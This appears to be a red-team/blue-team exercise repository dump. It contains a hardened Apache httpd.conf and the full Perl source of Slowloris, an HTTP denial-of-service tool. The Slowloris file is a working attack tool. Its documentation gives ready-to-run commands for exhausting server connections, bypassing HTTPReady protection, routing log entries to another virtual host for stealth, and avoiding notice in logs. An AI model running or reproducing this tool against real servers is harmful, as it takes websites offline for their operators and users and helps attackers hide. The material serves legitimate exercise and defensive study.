162 | # Similarly, one has to force some clients to use HTTP/1.0 to workaround 163 | # their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and 164 | # "force-response-1.0" for this. 165 | BrowserMatch "MSIE [2-6]" \ 166 | nokeepalive ssl-unclean-shutdown \ 167 | downgrade-1.0 force-response-1.0 168 | # MSIE 7 and newer should be able to use keepalive 169 | BrowserMatch "MSIE [17-9]" ssl-unclean-shutdown 170 | 171 | 172 | 173 | -------------------------------------------------------------------------------- /blue/httpd/httpd.conf: -------------------------------------------------------------------------------- 1 | ServerTokens Prod 2 | 3 | ServerRoot "/etc/httpd" 4 | 5 | PidFile run/httpd.pid 6 | 7 | Timeout 60 8 | 9 | KeepAlive Off 10 | 11 | MaxKeepAliveRequests 100 12 | 13 | KeepAliveTimeout 15 14 | 15 | 16 | 17 | StartServers 8 18 | MinSpareServers 5 19 | MaxSpareServers 20 20 | ServerLimit 256 21 | MaxClients 256 22 | MaxRequestsPerChild 4000 23 | 24 | 25 | 26 | StartServers 4 27 | MaxClients 300 28 | MinSpareThreads 25 29 | MaxSpareThreads 75 30 | ThreadsPerChild 25 31 | MaxRequestsPerChild 0 32 | 33 | 34 | Listen 80 35 | 36 | LoadModule auth_basic_module modules/mod_auth_basic.so 37 | LoadModule auth_digest_module modules/mod_auth_digest.so 38 | LoadModule authn_file_module modules/mod_authn_file.so 39 | LoadModule authn_alias_module modules/mod_authn_alias.so 40 | LoadModule authn_anon_module modules/mod_authn_anon.so 41 | LoadModule authn_dbm_module modules/mod_authn_dbm.so 42 | LoadModule authn_default_module modules/mod_authn_default.so 43 | LoadModule authz_host_module modules/mod_authz_host.so 44 | LoadModule authz_user_module modules/mod_authz_user.so 45 | LoadModule authz_owner_module modules/mod_authz_owner.so 46 | LoadModule authz_groupfile_module modules/mod_authz_groupfile.so 47 | LoadModule authz_dbm_module modules/mod_authz_dbm.so 48 | LoadModule authz_default_module modules/mod_authz_default.so 49 | LoadModule ldap_module 
modules/mod_ldap.so 50 | LoadModule authnz_ldap_module modules/mod_authnz_ldap.so 51 | LoadModule include_module modules/mod_include.so 52 | LoadModule log_config_module modules/mod_log_config.so 53 | LoadModule logio_module modules/mod_logio.so 54 | LoadModule env_module modules/mod_env.so 55 | LoadModule ext_filter_module modules/mod_ext_filter.so 56 | LoadModule mime_magic_module modules/mod_mime_magic.so 57 | LoadModule expires_module modules/mod_expires.so 58 | LoadModule deflate_module modules/mod_deflate.so 59 | LoadModule headers_module modules/mod_headers.so 60 | LoadModule usertrack_module modules/mod_usertrack.so 61 | LoadModule setenvif_module modules/mod_setenvif.so 62 | LoadModule mime_module modules/mod_mime.so 63 | LoadModule dav_module modules/mod_dav.so 64 | LoadModule status_module modules/mod_status.so 65 | LoadModule autoindex_module modules/mod_autoindex.so 66 | LoadModule info_module modules/mod_info.so 67 | LoadModule dav_fs_module modules/mod_dav_fs.so 68 | LoadModule vhost_alias_module modules/mod_vhost_alias.so 69 | LoadModule negotiation_module modules/mod_negotiation.so 70 | LoadModule dir_module modules/mod_dir.so 71 | LoadModule actions_module modules/mod_actions.so 72 | LoadModule speling_module modules/mod_speling.so 73 | LoadModule userdir_module modules/mod_userdir.so 74 | LoadModule alias_module modules/mod_alias.so 75 | LoadModule substitute_module modules/mod_substitute.so 76 | LoadModule rewrite_module modules/mod_rewrite.so 77 | LoadModule proxy_module modules/mod_proxy.so 78 | LoadModule proxy_balancer_module modules/mod_proxy_balancer.so 79 | LoadModule proxy_ftp_module modules/mod_proxy_ftp.so 80 | LoadModule proxy_http_module modules/mod_proxy_http.so 81 | LoadModule proxy_ajp_module modules/mod_proxy_ajp.so 82 | LoadModule proxy_connect_module modules/mod_proxy_connect.so 83 | LoadModule cache_module modules/mod_cache.so 84 | LoadModule suexec_module modules/mod_suexec.so 85 | LoadModule disk_cache_module 
modules/mod_disk_cache.so 86 | LoadModule cgi_module modules/mod_cgi.so 87 | LoadModule version_module modules/mod_version.so 88 | 89 | 90 | Include conf.d/*.conf 91 | 92 | 93 | User apache 94 | Group apache 95 | 96 | 97 | ServerAdmin root@localhost 98 | 99 | 100 | UseCanonicalName Off 101 | 102 | DocumentRoot "/var/www/html" 103 | 104 | 105 | Options FollowSymLinks 106 | AllowOverride None 107 | 108 | 109 | 110 | 111 | 112 | Options -Indexes -FollowSymLinks -ExecCGI 113 | 114 | AllowOverride None 115 | 116 | Order allow,deny 117 | Allow from all 118 | 119 | 120 | 121 | 122 | UserDir disabled 123 | 124 | 125 | 126 | 127 | 128 | AccessFileName .htaccess 129 | 130 | 131 | Order allow,deny 132 | Deny from all 133 | Satisfy All 134 | 135 | 136 | TypesConfig /etc/mime.types 137 | 138 | DefaultType text/plain 139 | 140 | 141 | MIMEMagicFile conf/magic 142 | 143 | 144 | HostnameLookups Off 145 | 146 | ErrorLog logs/error_log 147 | 148 | LogLevel warn 149 | 150 | LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined 151 | LogFormat "%h %l %u %t \"%r\" %>s %b" common 152 | LogFormat "%{Referer}i -> %U" referer 153 | LogFormat "%{User-agent}i" agent 154 | 155 | CustomLog logs/access_log combined 156 | 157 | ServerSignature Off 158 | 159 | Alias /icons/ "/var/www/icons/" 160 | 161 | 162 | Options Indexes MultiViews FollowSymLinks 163 | AllowOverride None 164 | Order allow,deny 165 | Allow from all 166 | 167 | 168 | 169 | DAVLockDB /var/lib/dav/lockdb 170 | 171 | 172 | ScriptAlias /cgi-bin/ "/var/www/cgi-bin/" 173 | 174 | 175 | AllowOverride None 176 | Options None 177 | Order allow,deny 178 | Allow from all 179 | 180 | 181 | 182 | 183 | IndexOptions FancyIndexing VersionSort NameWidth=* HTMLTable Charset=UTF-8 184 | 185 | AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip 186 | 187 | AddIconByType (TXT,/icons/text.gif) text/* 188 | AddIconByType (IMG,/icons/image2.gif) image/* 189 | AddIconByType (SND,/icons/sound2.gif) audio/* 190 | 
AddIconByType (VID,/icons/movie.gif) video/* 191 | 192 | AddIcon /icons/binary.gif .bin .exe 193 | AddIcon /icons/binhex.gif .hqx 194 | AddIcon /icons/tar.gif .tar 195 | AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv 196 | AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip 197 | AddIcon /icons/a.gif .ps .ai .eps 198 | AddIcon /icons/layout.gif .html .shtml .htm .pdf 199 | AddIcon /icons/text.gif .txt 200 | AddIcon /icons/c.gif .c 201 | AddIcon /icons/p.gif .pl .py 202 | AddIcon /icons/f.gif .for 203 | AddIcon /icons/dvi.gif .dvi 204 | AddIcon /icons/uuencoded.gif .uu 205 | AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl 206 | AddIcon /icons/tex.gif .tex 207 | AddIcon /icons/bomb.gif core 208 | 209 | AddIcon /icons/back.gif .. 210 | AddIcon /icons/hand.right.gif README 211 | AddIcon /icons/folder.gif ^^DIRECTORY^^ 212 | AddIcon /icons/blank.gif ^^BLANKICON^^ 213 | 214 | DefaultIcon /icons/unknown.gif 215 | 216 | 217 | ReadmeName README.html 218 | HeaderName HEADER.html 219 | 220 | AddLanguage en .en 221 | 222 | LanguagePriority en ca cs da de el eo es et fr he hr it ja ko ltz nl nn no pl pt pt-BR ru sv zh-CN zh-TW 223 | 224 | ForceLanguagePriority Prefer Fallback 225 | 226 | AddDefaultCharset UTF-8 227 | 228 | AddType application/x-compress .Z 229 | AddType application/x-gzip .gz .tgz 230 | 231 | AddType application/x-x509-ca-cert .crt 232 | AddType application/x-pkcs7-crl .crl 233 | 234 | AddHandler type-map var 235 | 236 | AddType text/html .shtml 237 | AddOutputFilter INCLUDES .shtml 238 | 239 | Alias /error/ "/var/www/error/" 240 | 241 | 242 | 243 | 244 | AllowOverride None 245 | Options IncludesNoExec 246 | AddOutputFilter Includes html 247 | AddHandler type-map var 248 | Order allow,deny 249 | Allow from all 250 | LanguagePriority en es de fr 251 | ForceLanguagePriority Prefer Fallback 252 | 253 | 254 | 255 | 256 | 257 | BrowserMatch "Mozilla/2" nokeepalive 258 | BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 259 | 
BrowserMatch "RealPlayer 4\.0" force-response-1.0 260 | BrowserMatch "Java/1\.0" force-response-1.0 261 | BrowserMatch "JDK/1\.0" force-response-1.0 262 | 263 | BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully 264 | BrowserMatch "MS FrontPage" redirect-carefully 265 | BrowserMatch "^WebDrive" redirect-carefully 266 | BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully 267 | BrowserMatch "^gnome-vfs/1.0" redirect-carefully 268 | BrowserMatch "^XML Spy" redirect-carefully 269 | BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully 270 | 271 | -------------------------------------------------------------------------------- /red/slowloris.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | use strict; 3 | use IO::Socket::INET; 4 | use IO::Socket::SSL; 5 | use Getopt::Long; 6 | use Config; 7 | 8 | $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors 9 | 10 | print < \$shost, 45 | 'dns=s' => \$host, 46 | 'httpready' => \$httpready, 47 | 'num=i' => \$connections, 48 | 'cache' => \$cache, 49 | 'port=i' => \$port, 50 | 'https' => \$ssl, 51 | 'tcpto=i' => \$tcpto, 52 | 'test' => \$test, 53 | 'timeout=i' => \$timeout, 54 | 'version' => \$version, 55 | ); 56 | 57 | if ($version) { 58 | print "Version 0.7\n"; 59 | exit; 60 | } 61 | 62 | unless ($host) { 63 | print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; 64 | print "\n\tType 'perldoc $0' for help with options.\n\n"; 65 | exit; 66 | } 67 | 68 | unless ($port) { 69 | $port = 80; 70 | print "Defaulting to port 80.\n"; 71 | } 72 | 73 | unless ($tcpto) { 74 | $tcpto = 5; 75 | print "Defaulting to a 5 second tcp connection timeout.\n"; 76 | } 77 | 78 | unless ($test) { 79 | unless ($timeout) { 80 | $timeout = 5; 81 | print "Defaulting to a 100 second re-try timeout.\n"; 82 | } 83 | unless ($connections) { 84 | $connections = 10000; 85 | print "Defaulting to 1000 connections.\n"; 86 | } 87 | } 88 | 89 | my 
$usemultithreading = 0; 90 | if ( $Config{usethreads} ) { 91 | print "Multithreading enabled.\n"; 92 | $usemultithreading = 1; 93 | use threads; 94 | use threads::shared; 95 | } 96 | else { 97 | print "No multithreading capabilites found!\n"; 98 | print "Slowloris will be slower than normal as a result.\n"; 99 | } 100 | 101 | my $packetcount : shared = 0; 102 | my $failed : shared = 0; 103 | my $connectioncount : shared = 0; 104 | 105 | srand() if ($cache); 106 | 107 | if ($shost) { 108 | $sendhost = $shost; 109 | } 110 | else { 111 | $sendhost = $host; 112 | } 113 | if ($httpready) { 114 | $method = "POST"; 115 | } 116 | else { 117 | $method = "GET"; 118 | } 119 | 120 | if ($test) { 121 | my @times = ( "2", "30", "90", "240", "500" ); 122 | my $totaltime = 0; 123 | foreach (@times) { 124 | $totaltime = $totaltime + $_; 125 | } 126 | $totaltime = $totaltime / 60; 127 | print "This test could take up to $totaltime minutes.\n"; 128 | 129 | my $delay = 0; 130 | my $working = 0; 131 | my $sock; 132 | 133 | if ($ssl) { 134 | if ( 135 | $sock = new IO::Socket::SSL( 136 | PeerAddr => "$host", 137 | PeerPort => "$port", 138 | Timeout => "$tcpto", 139 | Proto => "tcp", 140 | ) 141 | ) 142 | { 143 | $working = 1; 144 | } 145 | } 146 | else { 147 | if ( 148 | $sock = new IO::Socket::INET( 149 | PeerAddr => "$host", 150 | PeerPort => "$port", 151 | Timeout => "$tcpto", 152 | Proto => "tcp", 153 | ) 154 | ) 155 | { 156 | $working = 1; 157 | } 158 | } 159 | if ($working) { 160 | if ($cache) { 161 | $rand = "?" . int( rand(99999999999999) ); 162 | } 163 | else { 164 | $rand = ""; 165 | } 166 | my $primarypayload = 167 | "GET /$rand HTTP/1.1\r\n" 168 | . "Host: $sendhost\r\n" 169 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" 170 | . 
"Content-Length: 42\r\n"; 171 | if ( print $sock $primarypayload ) { 172 | print "Connection successful, now comes the waiting game...\n"; 173 | } 174 | else { 175 | print 176 | "That's odd - I connected but couldn't send the data to $host:$port.\n"; 177 | print "Is something wrong?\nDying.\n"; 178 | exit; 179 | } 180 | } 181 | else { 182 | print "Uhm... I can't connect to $host:$port.\n"; 183 | print "Is something wrong?\nDying.\n"; 184 | exit; 185 | } 186 | for ( my $i = 0 ; $i <= $#times ; $i++ ) { 187 | print "Trying a $times[$i] second delay: \n"; 188 | sleep( $times[$i] ); 189 | if ( print $sock "X-a: b\r\n" ) { 190 | print "\tWorked.\n"; 191 | $delay = $times[$i]; 192 | } 193 | else { 194 | if ( $SIG{__WARN__} ) { 195 | $delay = $times[ $i - 1 ]; 196 | last; 197 | } 198 | print "\tFailed after $times[$i] seconds.\n"; 199 | } 200 | } 201 | 202 | if ( print $sock "Connection: Close\r\n\r\n" ) { 203 | print "Okay that's enough time. Slowloris closed the socket.\n"; 204 | print "Use $delay seconds for -timeout.\n"; 205 | exit; 206 | } 207 | else { 208 | print "Remote server closed socket.\n"; 209 | print "Use $delay seconds for -timeout.\n"; 210 | exit; 211 | } 212 | if ( $delay < 166 ) { 213 | print < "$host", 249 | PeerPort => "$port", 250 | Timeout => "$tcpto", 251 | Proto => "tcp", 252 | ) 253 | ) 254 | { 255 | $working[$z] = 1; 256 | } 257 | else { 258 | $working[$z] = 0; 259 | } 260 | } 261 | else { 262 | if ( 263 | $sock[$z] = new IO::Socket::INET( 264 | PeerAddr => "$host", 265 | PeerPort => "$port", 266 | Timeout => "$tcpto", 267 | Proto => "tcp", 268 | ) 269 | ) 270 | { 271 | $working[$z] = 1; 272 | $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK 273 | } 274 | else { 275 | $working[$z] = 0; 276 | } 277 | } 278 | if ( $working[$z] == 1 ) { 279 | if ($cache) { 280 | $rand = "?" . int( rand(99999999999999) ); 281 | } 282 | else { 283 | $rand = ""; 284 | } 285 | my $primarypayload = 286 | "$method /$rand HTTP/1.1\r\n" 287 | . 
"Host: $sendhost\r\n" 288 | . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" 289 | . "Content-Length: 42\r\n"; 290 | my $handle = $sock[$z]; 291 | if ($handle) { 292 | print $handle "$primarypayload"; 293 | if ( $SIG{__WARN__} ) { 294 | $working[$z] = 0; 295 | close $handle; 296 | $failed++; 297 | $failedconnections++; 298 | } 299 | else { 300 | $packetcount++; 301 | $working[$z] = 1; 302 | } 303 | } 304 | else { 305 | $working[$z] = 0; 306 | $failed++; 307 | $failedconnections++; 308 | } 309 | } 310 | else { 311 | $working[$z] = 0; 312 | $failed++; 313 | $failedconnections++; 314 | } 315 | } 316 | } 317 | print "\t\tSending data.\n"; 318 | foreach my $z ( 1 .. $num ) { 319 | if ( $working[$z] == 1 ) { 320 | if ( $sock[$z] ) { 321 | my $handle = $sock[$z]; 322 | if ( print $handle "X-a: b\r\n" ) { 323 | $working[$z] = 1; 324 | $packetcount++; 325 | } 326 | else { 327 | $working[$z] = 0; 328 | #debugging info 329 | $failed++; 330 | $failedconnections++; 331 | } 332 | } 333 | else { 334 | $working[$z] = 0; 335 | #debugging info 336 | $failed++; 337 | $failedconnections++; 338 | } 339 | } 340 | } 341 | print 342 | "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; 343 | sleep($timeout); 344 | } 345 | } 346 | 347 | sub domultithreading { 348 | my ($num) = @_; 349 | my @thrs; 350 | my $i = 0; 351 | my $connectionsperthread = 50; 352 | while ( $i < $num ) { 353 | $thrs[$i] = 354 | threads->create( \&doconnections, $connectionsperthread, 1 ); 355 | $i += $connectionsperthread; 356 | } 357 | my @threadslist = threads->list(); 358 | while ( $#threadslist > 0 ) { 359 | $failed = 0; 360 | } 361 | } 362 | 363 | __END__ 364 | 365 | =head1 TITLE 366 | 367 | Slowloris 368 | 369 | =head1 VERSION 370 | 371 | Version 0.7 Beta 372 | 373 | =head1 DATE 374 | 375 | 06/17/2009 376 
| 377 | =head1 AUTHOR 378 | 379 | RSnake with threading from John Kinsella 380 | 381 | =head1 ABSTRACT 382 | 383 | Slowloris both helps identify the timeout windows of an HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. 384 | 385 | =head1 AFFECTS 386 | 387 | Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...? 388 | 389 | =head1 NOT AFFECTED 390 | 391 | IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...? 392 | 393 | =head1 DESCRIPTION 394 | 395 | Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of its threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right-sized timeouts as well. 396 | 397 | As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood. 
398 | 399 | =head2 Testing 400 | 401 | If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing: 402 | 403 | =head3 Testing Example: 404 | 405 | ./slowloris.pl -dns www.example.com -port 80 -test 406 | 407 | This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing). 408 | 409 | =head2 HTTP DoS 410 | 411 | Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though. 412 | 413 | =head3 HTTP DoS Example: 414 | 415 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 416 | 417 | =head2 HTTPReady Bypass 418 | 419 | HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch. 
420 | 421 | =head3 HTTPReady Bypass Example 422 | 423 | ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready 424 | 425 | =head2 Stealth Host DoS 426 | 427 | If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately. 428 | 429 | =head3 Stealth Host DoS Example: 430 | 431 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com 432 | 433 | =head2 HTTPS DoS 434 | 435 | Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary. 436 | 437 | =head3 HTTPS DoS Example: 438 | 439 | ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https 440 | 441 | =head2 HTTP Cache 442 | 443 | Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary. 444 | 445 | =head3 HTTP Cache Example: 446 | 447 | ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache 448 | 449 | =head1 Issues 450 | 451 | Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. 
Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distributed, although only Netscalar has been tested. 452 | 453 | Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it is unlikely to be noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. 454 | 455 | For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the number of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD. 456 | 457 | Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to its logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too. 458 | 459 | =head1 What is a slow loris? 460 | 461 | What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out: 462 | 463 | http://www.youtube.com/watch?v=rLdQ3UhLoD4 464 | --------------------------------------------------------------------------------